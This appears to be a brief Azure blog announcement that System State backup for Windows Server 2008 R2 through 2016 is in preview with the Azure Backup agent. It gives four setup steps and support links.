Availability for Windows Server (Preview)

The support for backing up System State with Azure Backup agent is available in preview for all Windows Server versions from Windows Server 2016 all the way down to Windows Server 2008 R2!

Getting started

Follow the four simple steps below to start protecting your Windows Servers using Azure Backup!

Create an Azure Recovery Services Vault.
Download the latest version of the Azure Backup Agent from the Azure Portal.  
Install and Register the Agent.
Start protecting Windows Server System State and other Files and Folders directly to Azure!

Related links and additional content

New to Azure Backup, sign up for a free Azure trial subscription.  
Need help? Reach out to Azure Backup forum for support or browse Azure Backup documentation.
Tell us how we can improve Azure Backup by contributing new ideas and voting up existing ones.
Follow us on Twitter @AzureBackup for the latest news and updates.
Connect with us at the Azure Tech Community.

Quelle: Azure